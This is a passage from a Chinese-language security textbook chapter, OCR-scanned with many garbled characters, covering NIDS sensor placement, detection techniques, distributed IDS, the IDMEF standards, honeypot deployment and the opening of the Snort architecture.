服务 的 客户 和 供应 商 ) 都 被 监控 。 外 部 防火 墙 对 网 络 中 那些 只 允许 来 自 其 他 公司 站 点 的 用 户 访 
问 的 部 分 也 提供 了 一 定 程 度 的 保护 。 内 部 防火 墙 也 可 用 于 网 络 的 某 些 部 分 来 提供 更 具体 的 
保护 。 

NIDS 传感器 通常 的 位 置 是 恰好 在 外 部 防火 墙 (图 8-5 中 位 置 1) 之 内 。 此 位 置 有 许多 
优点 : 

o 观测 源 自 外 部 的 攻击 ， 建 立 人 侵 网 络 的 外 围 防护 (外 部 防火 墙 )。 

o 强调 网 络 防火 墙 策略 或 性 能 问题 。 

o 观测 可 能 针对 Web 服务 器 或 FTP 服务 器 的 攻击 。 

© 即使 进入 的 攻击 不 能 被 识别 ，IDS 有 时 也 可 以 识别 出 由 于 服务 器 遭受 攻击 而 输出 的 流量 。 


O 第 9 章 将 详细 讨论 防火 墙 。 从 本 质 上 讲 ， 防 火 墙 是 用 于 保护 其 内 部 一 个 或 多 个 互 连 的 网 络 的 ， 将 内 部 网 络 与 
Internet 和 其 他 外 部 网 络 隔 开 。 防 火 墙 是 通过 限制 流量 、 拒 绝 潜在 的 威胁 数据 包 实现 对 内 部 网 络 的 保护 的 。 


B8F ABRA 203 






服务 网 络 (Web、 
邮件 、DNS 等 ) 


机 或 路 由 器 ”防火墙 


图 8-5 NIDS 传感器 部 署 实例 


如 果 不 将 NIDS 传感器 放 在 外 部 防火 墙 内 ， 安 全 管理 员 可 能 会 选择 在 外 部 防火 墙 与 
Internet 或 广域网 之 间 放 置 NIDS 传感器 (位 置 2 )。 在 此 位 置 ， 传 感 器 可 以 监控 所 有 网 络 流量 ， 
而 不 进行 过 滤 。 此 方法 的 优点 如 下 : 

e 监控 来 自 Internet 上 针对 目标 网 络 的 攻击 文档 (document) 数 。 

o 监控 来 自 Internet 上 针对 目标 网 络 的 攻击 文档 类 型 。 

在 位 置 2 的 传感器 比 位 于 站 点 网 络 上 其 他 位 置 的 任何 传感器 具有 更 高 的 处 理 负 担 。 

除了 在 网 络 边界 上 的 传感器 ， 管 理 员 可 以 在 内 部 防火 墙 的 任意 一 侧 配 置 一 个 防火 墙 以 及 一 个 
或 多 个 传感器 来 保护 支持 内 部 服务 器 和 数据 库 资源 等 的 主干 网 络 (位 置 3 )。 此 位 置 的 好 处 如 下 : 

e 监控 一 个 网 络 的 大 量 流量 ， 从 而 提高 发 现 攻击 的 概率 。 

e 检测 授权 用 户 在 企业 的 安全 范围 内 的 非 授权 活动 。 

因此 ， 在 位 置 3 的 传感器 既 能 监控 内 部 攻击 ， 也 能 监控 外 部 攻击 。 因 为 传感器 仅仅 针对 该 
网 站 的 一 部 分 设备 监控 流量 ， 它 可 以 调整 为 针对 特定 的 协议 和 攻击 类 型 ， 从 而 减少 处 理 负担 。 

最 后 ， 一 个 网 站 的 网 络 设施 可 能 包括 支持 一 个 部 门 所 有 的 用 户 工作 站 和 服务 器 的 分 离 的 
局 域 网 。 管 理 员 可 以 配置 一 个 防火 墙 和 NIDS 传感器 对 所 有 这 些 网 络 提供 额外 的 保护 或 者 将 
人 事 和 财务 网 络 等 关键 子 系统 作为 保护 目标 (位 置 4 )。 后 一 种 情况 使 用 的 传感器 提供 了 以 下 
好 处 : 

e 检测 针对 关键 系统 和 资源 的 攻击 。 

e 允许 将 有 限 的 资源 集中 到 具有 最 大 价值 的 网 络 资产 中 。 

与 位 置 3 的 传感器 一 样 ， 位 置 4 的 传感器 可 以 调整 为 针对 特定 的 协议 和 攻击 类 型 ， 这 样 可 
以 减少 处 理 负担 。 


8.5.3 ”入 侵 检 测 技术 


与 基于 主机 的 人 侵 检 测 一 样 ， 基 于 网 络 的 人 侵 检 测 使 用 特征 检测 和 异常 检测 技术 。 与 
HIDS 不 同 ， 基 于 异常 检测 技术 的 NIDS 有 许多 商业 产品 [GARC09]， 其 中 最 为 出 名 的 一 款 是 
统计 数据 包 异 常 检 测 引擎 ( Statistical Packet Anomaly Detection Engine，SPADE)， 这 是 我 们 后 
面 要 讨论 的 Snort 系统 的 一 个 可 用 插件 。 

特征 检测 [SCAR12] 列 出 以 下 例子 ， 这 些 类 型 的 攻击 都 适合 用 特征 检测 进行 识别 : 
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应 用 层 侦察 和 攻击 : 大 多 数 NIDS 技术 都 要 分 析 几 十 个 应 用 协议 ,通常 分 析 的 协议 包 
括 动 态 主机 配置 协议 (Dynamic Host Configuration Protocol, DHCP)、DNS、Finger、 
FTP, HTTP, Internet 消息 访问 协议 (Internet Message Access Protocol, IMAP). Internet 
中 继 聊 天 (Internet Relay Chat，IRC)、 网 络 文件 系统 (Network File System, NFS), ff 
局 协议 (Post Office Protocol，POP)、rlogin/rsh、 远 程 过 程 调用 (Remote Procedure Call, 
RPC)、 会 话 发 起 协议 (Session Initiation Protocol，SIP)、 服 务 器 消息 块 (Server Message 
Block, SMB), SMTP, SNMP, Telnet 和 简单 文件 传输 协议 (Trivial File Transfer 
Protocol，TFTP)， 以 及 数据 库 协 议 、 即 时 消息 应 用 和 对 称 文件 共享 软件 。NIDS EBA 
找 已 被 标识 为 面向 这 些 协 议 的 攻击 模式 。 攻 击 的 实例 包括 缓冲 区 溢出 、 口 令 猜测 和 亚 
意 软 件 传输 等 。 

传输 层 侦 察 和 攻击 : NIDS 分 析 TCP 和 UDP 流量 ， 也 可 能 是 其 他 传输 层 协议 。 攻 击 的 
例子 有 异常 数据 包 碎片 、 易 受 攻击 端口 扫描 和 TCP 特定 攻击 (如 SYN 洪 泛 )。 

网 络 层 侦察 和 攻击 : NIDS 在 这 一 层 通常 分 析 IPv4、IPv6、ICMP 和 IGMP。 攻 击 的 实 
例 是 IP 地 址 欺骗 和 非法 的 IP 头 部 值 。 

意外 应 用 程序 服务 : NIDS 试图 确定 传输 连接 上 的 活动 是 否 与 预期 的 应 用 协议 一 致 。 一 
个 实例 是 主机 运行 未 经 授权 的 应 用 服务 。 

策略 违背 (policy violation): 实例 包括 使 用 不 适当 的 Web 站 点 和 使 用 禁用 的 应 用 协议 。 


异常 检测 技术 [SCAR07] 列 出 以 下 实例 ， 这 些 类 型 的 攻击 都 适合 用 异常 检测 进行 识别 : 


拒绝 服务 ( DoS) 攻击 : 这 种 攻击 涉及 或 者 显著 提高 数据 包 流 量 ， 或 者 显著 增加 连接 尝 
试 次 数 ， 试 图 搞 垮 目标 系统 。 第 7 章 中 分 析 过 这 些 攻 击 。 异 常 检测 适用 于 此 类 攻击 。 
扫描 : 当 攻 击 者 通过 发 送 不 同 种 类 的 数据 包 探 测 目标 网 络 或 系统 时 ， 扫 描 攻 击发 生 。 
使 用 从 目标 接收 到 的 反馈 ,攻击 者 可 以 了 解 系统 的 许多 特征 和 安全 漏洞 。 因 此 ， 对 攻 
击 者 来 说 ， 扫 描 攻 击 作 为 一 种 目标 识别 工具 。 通 过 应 用 层 (如 标题 抓 取 (banner 
grabbing) 9)、 传 输 层 (如 TCP 和 UDP 端口 扫描 ) 和 网 络 层 (An ICMP 扫描 ) 的 正常 流 
模式 ， 可 以 检测 到 扫描 。 

蠕虫 : 可 以 以 多 种 方式 检测 到 蠕虫 8 在 主机 之 间 传 播 。 某 些 蠕虫 快速 传播 并 占用 大 量 的 
带宽 。 蠕 虫 还 有 一 些 可 能 被 检测 到 的 特征 ， 比 如 它们 可 能 导致 通常 不 通信 的 主机 相互 
通信 ， 并 且 它 们 也 可 能 导致 主机 使 用 它们 通常 不 使 用 的 端口 。 很 多 蠕虫 也 执行 扫描 。 
第 6 章 已 经 详细 讨论 了 蚂 虫 。 


状态 协议 分 析 (SPA) [SCAR12] 详细 描述 了 这 种 异常 检测 技术 ， 其 中 检测 是 通过 比较 观 


8.5.4 


测 的 网 络 流量 与 预定 的 、 供 应 商 提供 的 正常 的 流量 特征 实现 的 。 这 与 基于 组 织 特定 的 流量 特征 
的 异常 检测 技术 不 同 。SPA 通过 推断 和 追踪 网 络 、 传 输 和 应 用 协议 的 状态 ， 保 证 网 络 活动 按 预 
期 发 展 。SPA 的 主要 优势 在 于 其 对 所 要 求 资源 的 高 利用 率 。 


警报 日 志 记 录 


当 传感器 检测 到 潜在 危险 时 ， 它 将 发 送 一 个 警报 并 记录 与 事件 相关 的 信息 。NIDS 分 析 模 


© 


© 


块 可 以 使 用 此 信息 来 优化 人 侵 检测 参数 和 算法 。 安全 管理 员 可 以 使 用 此 信息 来 设计 保护 技术 。 
由 NIDS 传感器 记录 的 典型 信息 如 下 : 


通常 ， 标 题 抓 取 由 初始 化 到 网 络 服务 器 的 连接 和 记录 会 话 开始 返回 的 数据 两 个 步骤 组 成 。 此 信息 可 以 指定 
应 用 程序 名 、 版 本 号 ， 甚 至 包括 运行 服务 的 操作 系统 [DAMR03]。 

蠕虫 是 一 种 程序 ， 可 以 复制 自身 并 通过 网 络 连 接 在 计算 机 间 发 送 拷贝 。 其 一 旦 到 达 ， 该 蠕虫 程序 会 被 激活 
来 复制 和 再 次 传播 ， 除 了 传播 ， 该 蠕虫 病毒 通常 执行 某 些 有 害 的 功能 。 
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e HER (通常 是 日 期 和 时 间 ) 。 

连接 或 会 话 ID 号 (通常 是 分 配给 每 个 TCP 连接 或 无 连接 协议 的 数据 包 组 的 连续 的 或 
唯一 的 号 码 )。 

事件 或 警报 类 型 。 

分 级 (如 优先 级 、 严 重 性 、 影 响 和 信任 等 )。 

网 络 层 、 传 输 层 和 应 用 层 协议 。 

源 和 目的 IP 地 址 。 

源 和 目的 TCP 或 UDP 端口 ,或 者 ICMP 类 型 和 代码 。 
通过 连接 传输 的 字 节 数 。 

已 解码 的 有 效 载荷 数据 ， 如 应 用 程序 请 求 和 响应 。 

e 状态 相关 信息 (如 经 过 身份 验证 的 用 户 名 )。 


86 ”分 布 式 或 混合 式 入 侵 检 测 


在 最 近 几 年 ，IDS 通信 的 概念 已 演变 成 使 用 分 布 式 系统 的 合作 方案 来 发 现 人 侵 ， 并 适应 不 
断 变化 的 攻击 模式 。 这 些 方案 将 HIDS 的 进程 与 数据 细节 以 及 NIDS 的 事件 与 数据 集成 到 一 个 
中 央 IDS 中 ， 中 央 IDS 通过 对 这 些 可 以 互补 的 信息 进行 统一 的 管理 和 关联 ， 在 企业 的 IT 基础 
设施 中 发 现 人 侵 并 做 出 响应 。 对 于 IDS、 防 火 墙 、 病 毒 和 蠕虫 检测 器 等 系统 ， 始 终 存 在 两 个 关 
键 问题 。 首 先 ， 这 些 工具 无 法 识别 新 威胁 或 发 现 已 存在 的 威胁 的 新 改进 。 其 次 ， 难 以 提供 足够 
快速 的 更 新 方案 处 理 迅 速 传播 的 攻击 。 对 外 围 防御 (如 防火 墙 )， 另 一 个 问题 是 现代 企业 边界 
定义 很 松散 ， 主 机 通常 能 够 移 人 和 迁 出 ， 例 如 使 用 无 线 技术 通信 的 主机 和 可 以 插 人 网 络 端口 的 
便携 电脑 。 

攻击 者 以 多 种 方式 利用 这 些 问 题 。 更 为 传统 的 攻击 方法 是 ， 开 发 蠕虫 和 其 他 恶意 软件 ， 它 
们 迅速 传播 ， 引 发 其 他 攻击 (例如 拒绝 服务 攻击 )， 在 防御 启动 之 前 ， 以 绝对 优势 力量 进行 攻 
击 。 这 种 攻击 方法 仍然 流行 。 但 最 近 攻 击 者 增加 了 一 种 完全 不 同 的 方法 : 降低 攻击 传播 的 速 
度 ， 使 传统 的 算法 更 难 检测 [ANTH07]。 

对 付 此 类 攻击 的 一 种 方法 是 开发 合作 系统 以 识别 基于 多 个 细微 的 线索 的 攻击 ， 然 后 快速 适 
应 。 在 这 个 方法 中 ， 异 常 检测 器 在 本 地 节点 查找 异常 活动 的 证 据 。 例 如 ， 一 台 计 算 机 通常 只 需 
几 个 网 络 连接 ， 如 果 突 然 显示 以 较 高 的 速率 请 求 网 络 连接 ， 则 会 被 怀疑 攻击 正在 进行 。 仅 和 赁 此 
证 据 ， 本 地 系统 如 果 做 出 受到 可 疑 攻击 的 反应 (如 断 开 与 网 络 的 连接 并 发 出 警报 )， 则 有 误 报 
的 风险 ; 但 如 果 忽 略 该 攻击 或 等 待 进一步 的 证 据 ， 则 有 漏 报 风险 。 在 自 适应 协作 系统 中 ， 本 地 
节点 不 会 将 其 怀疑 通过 对 等 “gossip ”协议 通知 其 他 机 器 ， 而 是 以 概率 的 形式 告知 其 他 计算 机 : 
网 络 正在 受到 攻击 。 如 果 一 台 计 算 机 收 到 足够 多 这 些 消 息 ， 且 超过 一 个 阔 值 ， 则 计算 机 认为 攻 
击 正在 进行 并 做 出 响应 。 计 算 机 会 从 本 地 响应 来 保护 自身 并 将 警报 发 送 到 中 央 系 统 。 

这 种 方法 的 一 个 实例 是 由 英特尔 公司 开发 的 称 为 “自治 企业 安全 ”的 方案 [AGOS06]。 
图 8-6 说 明了 这 种 方法 。 这 种 方法 不 单纯 依赖 于 外 围 的 防范 机 制 ， 如 防火 墙 或 单独 的 基于 主机 
的 防护 。 相 反 ， 每 个 终端 主机 和 每 个 网 络 设备 (如 路 由 器 ) 都 被 认为 是 潜在 的 传感器 并 且 能 够 
安装 传感器 软件 模块 。 这 种 以 分 布 式 配置 的 传感器 可 以 交换 信息 以 确定 网 络 的 状态 ( 即 是 否 攻 
击 在 进行 )。 

英特尔 公司 是 基于 下 面 的 动机 提出 这 种 方法 的 : 

1. IDS 有 选择 的 部 署 可 能 会 错过 基于 网 络 的 攻击 或 者 识别 正在 进行 的 攻击 会 很 慢 。 使 用 
多 个 IDS 共享 信息 可 以 提供 更 高 的 覆盖 率 和 更 快 的 攻击 响应 ， 尤 其 对 缓慢 增长 的 攻击 (如 
[BAIL05]、[RAJA05])。 
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基于 策略 的 
自 适应 反馈 





PEP= 策 略 强 制 点 
DDI= 分 布 式 检测 和 推断 


图 8-6 一 个 自治 的 企业 安全 系统 的 整体 体系 结构 


2. 主机 级 的 网 络 流量 分 析 提 供 了 一 种 与 网 络 设备 (如 路 由 器 ) 中 发 现 的 网 络 流量 相 比 其 流量 
更 少 的 一 种 环境 。 因 此 ， 攻 击 模 式 将 更 突出 ， 能 够 有 效 地 提供 较 高 的 信 噪 比 (signal-to-noise ratio). 

3. 基于 主机 的 检测 器 可 以 使 用 更 丰富 的 数据 集 ， 使 用 主机 的 应 用 程序 数据 作为 本 地 分 类 器 
的 输入 。 

分 布 式 或 混合 式 IDS 可 以 相互 共享 和 交换 数据 [SCAR12]， 我 们 可 以 用 单个 供应 商 的 多 个 
产品 来 搭建 这 样 的 IDS。 很 明显 这 种 做 法 是 很 简单 的 ， 但 是 并 不 一 定 是 最 高 效 或 者 最 普 适 的 。 
比如 专业 的 安全 信息 和 事件 管理 软件 (SIEM) 也 可 以 导入 和 分 析 来 自 各 种 各 样 的 传感器 和 产品 
的 数据 。 这 类 软件 依赖 于 标准 的 协议 ， 比 如 下 一 节 要 介绍 的 人 侵 检测 消息 交换 格式 Intrusion 
Detection Message Exchange Format)。 通 过 对 比 可 以 帮助 我 们 阐明 分 布 式 方法 的 优点 。 假 定 一 
台 主 机 受到 的 是 一 种 延长 (Prolonged) 攻击 并 且 主 机 配置 为 最 大 限度 地 减少 误 报 。 在 攻击 的 前 
期 ， 因 为 误 报 的 风险 很 高 ， 所 以 没有 听 到 报警 。 如 果 攻 击 仍然 继续 ， 攻 击 正在 进行 的 证 据 将 更 
为 明显 ， 随 之 误 报 的 风险 下 降 。 然 而 很 长 时 间 已 经 过 去 了 。 现 在 考虑 多 个 本 地 传感器 ， 将 它们 
每 个 怀疑 进行 的 攻击 进行 协作 处 理 。 因 为 许多 系统 看 到 相同 的 证 据 ， 可 以 以 低 误 报 风险 发 布 报 
F. AE, 我们 不 是 使 用 很 长 一 段 时 间 而 是 使 用 大 量 的 传感器 ， 来 减少 误 报 并 检测 攻击 。 许 多 
供应 商 现 在 也 提供 这 种 类 型 的 产品 。 

我 们 现在 总 结 一 下 此 方法 的 主要 做 法 ， 如 图 8-6 所 示 。 中 央 系 统 配 置 了 一 组 默认 的 安全 策 
略 ， 这 些 策略 根据 分 布 式 传感器 的 输入 进行 自 适应 ,将 具体 动作 传递 给 分 布 式 系统 中 各 种 平 
台 。 设 备 的 特定 策略 包括 立即 采取 动作 或 对 参数 设置 进行 调整 。 中 央 系 统 也 能 与 所 有 调整 计时 
和 协作 gossip 消息 内 容 的 平台 交流 协作 策略 。 三 种 类 型 的 输入 指导 中 央 系 统 的 动作 ; 

o 摘要 事件 (summary event): 由 中 间 采 集 点 (如 防火 墙 、IDS 或 为 企业 网 络 特定 网 段 提 
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供 服务 的 服务 器 ) 采集 的 来 源 不 同 的 事件 。 这 些 事件 被 总 结 以 便 交付 给 中 央 策 略 系统 。 
e DDI 事件 (DDI event): 分 布 式 检测 和 推断 (DDI) 事件 是 当 gossip 流量 使 平台 得 出 攻 
击 正在 进行 的 结论 时 所 生成 的 警报 。 
o PEP 事件 (PEPevent) : 策略 实施 点 (PEP) 位 于 可 信 的 、 自 防御 的 平台 和 智能 IDS 中 。 这 
些 系统 关联 分 布 式 信息 、 本 地 决策 和 单个 设备 动作 来 检测 在 主机 级 别 无 法 识别 的 入侵 。 


8.7 ”入侵 检测 交换 格式 


为 了 促进 可 以 运行 在 各 种 平台 和 环境 的 分 布 式 IDS 的 开发 ， 需 要 制定 支持 协同 工作 能 力 
的 标准 。 这 类 标准 由 IETF 下 属 的 入 侵 检测 工作 小 组 ( Intrusion Detection Working Group) 负责 
制定 ， 旨 在 为 入侵 检测 和 响应 系统 ， 以 及 需要 与 其 他 机 器 交互 的 管理 系统 的 共享 信息 定义 数据 [291 
格式 和 交换 过 程 。 该 工作 组 在 2007 年 发 布 了 以 下 RFC: 
© 入 侵 检 测 消息 交换 要 求 (Intrusion Detection Message Exchange Requirements, RFC 4766 ) : 
这 份 文档 定义 了 入 侵 检 测 消 息 交 换 格 式 (Intrusion Detection Message Exchange 
Format, IDMEF)， 同 时 也 明确 了 交换 IDMEF 使 用 的 通信 协议 。 
© 入 侵 检 测 消息 交换 格式 (Intrusion Detection Message Exchange Format, RFC 4765): 这 
份 文档 描述 了 入 侵 检测 系统 导出 信息 时 的 一 个 数据 模型 ， 并 解释 了 使 用 这 个 模型 的 基 
本 原理 。 文 档 同 时 给 出 了 该 数据 模型 使 用 可 扩展 标记 语言 (XML) 的 一 个 实现 。 另 外 ， 
XML 文档 类 型 定义 正在 开发 当中 ， 已 经 给 出 一 个 示例 。 
© 入 侵 检 测 交换 协议 〈( Intrusion Detection Exchange Protocol, RFC 4767): 这 份 文档 描述 
了 人 侵 检 测 交 换 协 议 (IDXP)。 这 是 在 人 侵 检测 系统 之 间 进 行 数据 交换 的 应 用 层 协 议 。 
IDXP 支持 基于 面向 连接 协议 的 相互 授权 、 完 整 性 和 可 信和 性 。 
图 8-7 说 明了 入 侵 检测 消息 交换 方法 所 基于 的 模型 的 关键 元 素 。 此 模型 不 对 应 任何 特定 的 
产品 或 实现 ,但 其 功能 组 件 是 所 有 IDS 的 关键 元 素 。 功 能 组 件 如 下 所 述 : 





图 8-7 人 侵 检测 消息 交换 模型 l 
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o 数据 源 (data source): IDS 用 来 检测 未 授权 或 非 预期 活动 的 原始 数据 。 常 见 的 数据 源 包 
括 网 络 数据 包 、 操 作 系统 审计 日 志 、 应 用 程序 审计 日 志和 系统 生成 的 校 验 和 数据 。 
© 传感器 (sensor): 从 数据 源 采 集 数 据 。 传 感 器 将 事件 转发 给 分 析 器 。 
e 分 析 器 (analyzer): 用 来 分 析 传感器 采集 的 标记 为 未 授权 或 非 预期 的 活动 或 安全 管理 员 
感 兴趣 事件 的 数据 的 ID 组 件 或 进程 。 在 许多 现 有 IDS 中 ， 传 感 器 和 分 析 器 是 同一 组 件 
的 一 部 分 。 
e 管理 员 (administrator): 对 设置 企业 的 安全 策略 、 决 策 部 署 和 配置 IDS 负 全 部 责任 的 
人 。 他 与 该 IDS 的 操作 员 可 以 是 同一 个 人 ， 也 可 以 不 是 。 在 某 些 组 织 ， 管 理 员 属于 网 
络 或 系统 管理 组 。 而 在 其 他 组 织 ， 这 是 一 个 独立 的 职位 。 
e 管理 器 (manager) : 操作 员 用 来 管理 ID 系统 各 种 组 件 的 ID 组 件 或 进程 。 管 理 功能 通 
常 包 括 传感器 配置 、 分 析 器 配置 、 事 件 通知 管理 、 数 据 合 并 和 报告 。 
e 操作 员 (operator): IDS 管理 器 的 主要 用 户 。 操 作 员 通 常 监控 IDS 的 输出 并 启动 或 建议 
进一步 的 操作 。 
在 此 模型 中 ， 入 侵 检测 按 以 下 方式 进行 。 传 感 器 监控 数据 源 以 查找 可 疑 的 活动 (activity)， 
如 表明 不 期 望 的 telnet 活动 的 网 络 会 话 、 表 明 用 户 试图 访问 未 被 授权 访问 的 文件 的 操作 系统 日 
志 条 目 、 表 明 连 续 登 录 失 败 的 应 用 程序 日 志文 件 等 。 传 感 器 将 可 疑 的 活动 以 事件 (event) 的 形 
式 发 送 到 分 析 器 。 事 件 描述 了 给 定时 间 段 内 的 活动 。 如 果 分 析 器 确定 对 该 事件 感 兴趣 ， 它 将 发 
3K S4R (alert) 通知 管理 器 组 件 ， 其 中 包含 检测 到 的 异常 活动 及 其 发 生 时 的 细节 信息 。 管 理 器 . 
组 件 向 操作 员 发 出 通知 (notification)。 响 应 (response) 由 管理 器 组 件 或 操作 员 自 动 启 动 。 响 应 
的 实例 包括 将 活动 记 人 日 志 ， 记 录 描 述 该 事件 的 〈 来 自 数 据 源 的 ) 原始 数据 ， 终 止 网 络 、 用 户 
或 应 用 会 话 ， 以 及 更 改 网 络 或 系统 访问 控制 策略 。 人 安全 策略 〈security policy) 是 预定 义 的 、 格 
式 化 文档 的 陈述 ， 它 定义 了 哪些 活动 能 在 组 织 的 网 络 上 或 在 特定 主机 进行 ， 以 满足 组 织 的 要 
求 。 其 中 包括 哪些 主机 将 拒绝 外 部 网 络 的 访问 ， 但 并 不 仅 限 于 此 。 
此 规范 定义 了 事件 和 变更 信息 的 格式 、 消 息 类 型 以 及 人 侵 检测 信息 交流 的 交换 协议 。 
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Meer Mea Fee, BAAR ANAS, BAS AEM 
远离 关键 系统 而 设计 的 。 蜜 饶 的 功能 包括 : 

e 转移 攻击 者 对 重要 系统 的 访问 。 

e 收集 有 关 攻 击 者 活动 的 信息 。 

e | 诱 攻击 者 在 系统 中 逗留 足够 长 的 时 间 ， 以 便于 管理 员 对 此 攻击 做 出 响应 。 

这 些 系 统 填 满 了 看 起 来 有 价值 但 系统 的 合法 用 户 不 会 访问 的 伪造 信息 。 因 此 ， 任 何 对 蜜 铅 
的 访问 都 是 可 疑 的 。 蜜 饮 系 统 装 备 了 敏感 的 监控 器 和 事件 记录 器 ， 用 于 检测 这 些 访问 和 收集 有 
关 攻 击 者 的 活动 信息 。 因 为 任何 针对 蜜 钠 的 攻击 在 攻击 者 看 来 都 是 成 功 的 ， 所 以 管理 员 有 时 间 
来 调动 、 记 录 并 跟踪 攻击 者 而 不 必 暴 露 生产 系统 。 

蜜 钠 是 一 种 没有 产 出 的 资源 。 网 络 以 外 的 任何 人 与 密 钠 进行 交互 都 没有 合法 的 理由 。 因 
此 ， 任 何 与 蜜 饶 系 统 通信 的 尝试 很 可 能 是 一 个 探测 、 扫 描 或 者 攻击 。 相 反 ， 如 果 一 个 蜜 饶 发 起 
对 外 通信 ， 则 系统 可 能 已 被 破坏 。 

BERETS Oy A CE ae AC T 

e (ZEER (low interaction honeypot): BHAA h AERE IT 服务 或 系统 的 软件 

包 构 成 ， 它 足以 提供 一 种 真实 的 初级 交互 ， 但 是 却 无 法 提供 所 模拟 服务 或 系统 的 全 部 
功能 。 
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e BRA (high interaction honeypot): 该 类 密 钢 是 一 个 带 有 完整 操作 系统 、 服 务 以 及 
应 用 程序 的 真实 系统 ， 被 部 署 在 攻击 者 能 够 访问 的 地 方 。 

高 交互 蜜 钠 是 一 个 更 为 真实 的 目标 ,很 有 可 能 消耗 掉 攻击 者 更 长 的 时 间 。 但 是 它 需 要 极 大 
的 资源 ， 并 且 一 旦 被 攻破 ， 就 可 能 被 用 来 发 起 对 其 他 系统 的 攻击 。 对 于 运行 蜜 钢 的 组 织 来 说 ， 
很 有 可 能 导致 麻烦 的 法 律 或 声誉 问题 。 低 交互 蜜 钠 提供 了 一 个 低 真 实 度 的 目标 ， 它 能 够 在 攻击 
早期 识别 一 些 使 用 本 章 前 面 讨 论 的 攻击 技术 的 人 侵 者 。 通 常 来 说 ， 这 类 蜜 钢 作 为 一 个 提供 报警 
功能 的 分 布 式 IDS 的 组 件 已 经 足够 了 。"“ 蜜 钠 项 目 ”( The ge Project) 为 这 类 系统 提供 了 
大 量 的 资源 和 软件 包 。 

最 初 的 工作 是 使 用 具有 IP 地 址 的 单个 密 久 计算 机 引 话 黑 客 。 最 近 的 研究 集中 在 构建 整个 
蜜 饶 网 络 ， 用 来 模拟 一 个 企业 ， 包 括 会 使 用 到 的 实际 或 模拟 的 通信 量 和 数据 。 一 旦 黑客 进入 这 
个 网 络 ， 管 理 员 可 以 详细 观察 他 们 的 行为 ， 做 出 防范 方案 。 

蜜 缸 可 以 部 署 在 各 种 位 置 。 图 8-8 给 出 了 一 些 可 能 的 情况 。 位 置 取决 于 许多 因素 ， 如 企业 
有 兴趣 收集 的 信息 类 型 和 企业 为 获得 最 大 数量 数据 所 能 容忍 的 风险 级 别 。 
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ra 


邮件 、DNS 等 ) 
图 8-8” 蜜 钠 部 署 的 例子 


外 部 防火 墙 之 外 (位置 1 ) 的 蜜 铅 对 于 跟踪 试图 连接 到 网 络 范围 内 未 使 用 的 IP 地 址 的 尝 
试 非常 有 用 。 在 此 位 置 的 蜜 饶 不 会 增加 对 内 部 网 络 的 风险 ， 它 可 避免 在 防火 墙 后 的 系统 遭受 危 
险 。 而 且 ， 因 为 蜜 钒 吸引 了 许多 潜在 的 攻击 ， 所 以 它 减 少 了 由 防火 墙 和 内 部 IDS 传感器 引发 
的 警报 ,减轻 了 管理 负担 。 外 部 蜜 钢 的 缺点 是 它 捕获 内 部 攻击 者 的 能 力 非 常 有 限 ， 特 别 是 当 外 
部 防火 墙 在 两 个 方向 上 过 滤 通 信 流 量 时 。 
网 络 的 外 部 可 用 服务 (如 Web 和 邮件 ) 通常 被 称 为 DMZ ( 非 军事 区 )， 是 放置 蜜 饶 的 另 一 
个 候选 位 置 (位 置 2 )。 安 全 管理 员 必须 确保 蜜 铅 产生 的 任何 活动 对 DMZ 中 的 其 他 系统 是 安全 
的 。 此 位 置 的 一 个 缺点 是 ， 典 型 的 DMZ 是 无 法 完全 访问 的 ， 防 火 墙 通常 会 阻止 试图 到 DMZ 
中 访问 不 需要 的 服务 的 流量 。 因 此 ， 防 火 墙 要 人 么 不 得 不 打开 在 其 允许 之 外 的 流量 ， 尽 管 这 是 很 
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危险 的 ， SEZ BR tl EE TA HE 

TEAR (位置 3 ) 有 几 个 优点 。 它 最 重要 的 优点 是 可 以 捕获 内 部 攻击 。 在 此 位 置 的 
BHAT RMA RACE Ake, HAM Internet 到 内 部 网 络 本 不 允许 的 通信 量 。 它 还 
有 一 些 缺 点 。 最 严重 的 缺点 是 如 果 蜜 饶 被 破坏 ， 它 便 可 以 被 利用 来 攻击 内 部 的 其 他 系统 。 任 何 
从 Internet 到 攻击 者 的 更 多 通信 和 量 不 会 被 防火 墙 阻止 ， 因 为 它 被 认为 仅 是 到 蜜 色 的 通信 和 量 。 这 
个 蜜 铅 位 置 的 另 一 个 缺点 是 ， 与 位 置 2 一样， 防火 墙 必须 调整 过 滤器 以 允许 到 蜜 钢 的 通信 重 ， 
这 样 使 防火 墙 配 置 复杂 化 并 可 能 导致 内 部 网 络 潜在 的 破坏 。 


8.9 实例 系统 : Snort 


Snort 是 开源 、 高 度 可 配置 且 可 移植 的 基于 主机 或 基于 网 络 的 IDS。Snort 被 称 为 是 轻 量 级 
IDS， 它 具有 以 下 特征 : 

© 可 以 在 大 多 数 网 络 节点 (主机 、 服 务 器 和 路 由 器 ) 轻松 地 部 署 。 

© 使 用 少量 的 内 存 和 处 理 器 时 间 进 行 高 效 操作 。 

e 系统 管理 员 可 以 容易 地 进行 配置 ， 以 便 在 较 短 时 间 内 实现 特定 的 安全 解决 方案 。 

Snort 可 以 进行 实时 数据 包 的 捕获 、 协 议 分析 和 内 容 搜索 与 匹配 。 尽 管 Snort 可 以 通过 插 
件 扩展 来 分 析 其 他 网 络 协议 ， 但 它 主 要 还 是 用 于 分 析 TCP、UDP、ICMP 协议 。Snort 根据 一 
组 由 系统 管理 员 配 置 的 规则 ， 能 够 检测 到 很 多 种 攻击 和 探测 。 


8.9.1 Snort 体系 结构 





Ea 检测 | 
数据 包 | al | 


图 8-9 Snort 体系 结构 


一 个 Snort 安装 包括 4 个 逻辑 组 件 (如 图 8-9 所 示 ): 

© 数据 包 解码 器 (packet decoder): 数据 包 解 码 器 处 理 每 个 捕获 的 数据 包 ， 在 数据 链 路 、 
网 络 、 传 输 和 应 用 层 来 识别 和 隔离 协议 首部 。 解 码 器 需 尽 可 能 高 效 ， 它 的 主要 工作 包 
括 设置 指针 ， 以 便 可 以 很 容易 地 提取 各 种 协议 首部 。 

© 检测 引擎 ( detection engine): 检测 引擎 完成 人 侵 检 测 的 实际 工作 。 本 模块 基于 一 组 由 

安全 管理 员 配置 的 Snort 规则 来 分 析 每 个 数据 包 。 从 本 质 上 讲 ， 每 个 数据 包 依据 所 有 规 

则 进行 检查 ， 以 确定 该 数据 包 是 否 与 根据 规则 定义 的 特征 相 匹配 。 与 已 解码 的 数据 包 

匹配 的 第 一 个 规则 触发 规则 指定 的 动作 。 如 果 没 有 规则 匹配 该 数据 包 ， 则 检测 引擎 放 

弃 此 数据 包 。 

记录 器 (logger) : 对 于 每 个 与 规则 匹配 的 数据 包 ， 该 规则 指定 要 执行 的 日 志和 报警 选 

